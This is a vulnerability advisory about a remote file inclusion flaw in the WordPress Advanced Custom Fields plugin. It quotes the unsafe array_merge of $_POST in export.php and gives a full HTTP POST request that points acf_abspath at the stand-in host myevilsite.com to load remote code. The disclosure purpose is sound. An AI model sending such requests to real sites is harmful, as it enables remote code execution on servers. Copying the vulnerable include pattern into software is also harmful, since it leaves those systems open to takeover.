Advanced Custom Fields | ceriksen.com

Advisory

Analysis of vulnerability

A Remote File Inclusion vulnerability exists in the Advanced Custom Fields plugin for WordPress. By exploiting an unsafe use of array_merge which takes user-input in /core/actions/export.php, it is possible to override a value used for an include:

// vars
$defaults = array(
	'acf_abspath' => '../../../../../',
	'acf_posts' => array()
);
$my_options = array_merge( $defaults, $_POST );

require_once( $my_options['acf_abspath'] . 'wp-load.php');
require_once( $my_options['acf_abspath'] . 'wp-admin/admin.php');

// vars

$defaults = array(

'acf_abspath' => '../../../../../',

'acf_posts' => array()

);

$my_options = array_merge( $defaults, $_POST );

require_once( $my_options['acf_abspath'] . 'wp-load.php');

require_once( $my_options['acf_abspath'] . 'wp-admin/admin.php');

By posting another value for acf_abspath to the script, we can overwrite the value which is used for the two require_once calls. For instance, we can make a request like this which will request /wp-load.php and /wp-admin/admin.php from myevilsite.com:

POST /wordpress/wp-content/plugins/advanced-custom-fields/core/actions/export.php HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

acf_abspath=http://myevilsite.com

POST /wordpress/wp-content/plugins/advanced-custom-fields/core/actions/export.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 37

acf_abspath=http://myevilsite.com

ceriksen.com

Archives

WordPress Advanced Custom Fields remote file inclusion vulnerability